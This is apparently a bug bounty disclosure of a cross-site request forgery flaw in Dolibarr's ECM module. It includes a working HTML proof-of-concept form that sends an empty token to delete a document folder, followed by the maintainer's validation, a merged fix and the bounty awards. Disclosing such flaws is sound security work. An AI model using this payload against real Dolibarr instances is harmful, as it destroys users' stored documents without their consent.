Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid
Reported on Jul 18th 2021

✍️ Description

In this directory "https://demo.dolibarr.org/ecm/index.php?mainmenu=ecm&leftmenu=ecm&idmenu=167162" The attacker Can Perform a CSRF attack to Remove any folders.

In this Directory application take a parameter named "token" and I set "token" parameter value to nothings like "token=&action=add....." to Bypass "token" parameter

first open Following "PoC.html" then click on appeared bottom on the page and after that you can notice that the folder with 211 section is removed

🕵️‍♂️ Proof of Concept

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/ecm/dir_card.php">
      <input type="hidden" name="section" value="211" />
      <input type="hidden" name="module" value="ecm" />
      <input type="hidden" name="backtopage" value="&#47;core&#47;ajax&#47;ajaxdirtree&#46;php&#63;file&#95;manager&#61;1&amp;website&#61;&amp;pageid&#61;" />
      <input type="hidden" name="action" value="confirm&#95;deletedir" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="deletedirrecursive" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


💥 Impact

This vulnerability is capable of remove any Folders of any user's Documents

We have contacted a member of the dolibarr team and are waiting to hear back 8 days ago
Laurent Destailleur validated this vulnerability 6 days ago
amammad has been awarded the disclosure bounty
$40
The fix bounty is now up for grabs
$10
Laurent Destailleur confirmed that a fix has been merged on 0e18bd 6 days ago
Laurent Destailleur has been awarded the fix bounty
$10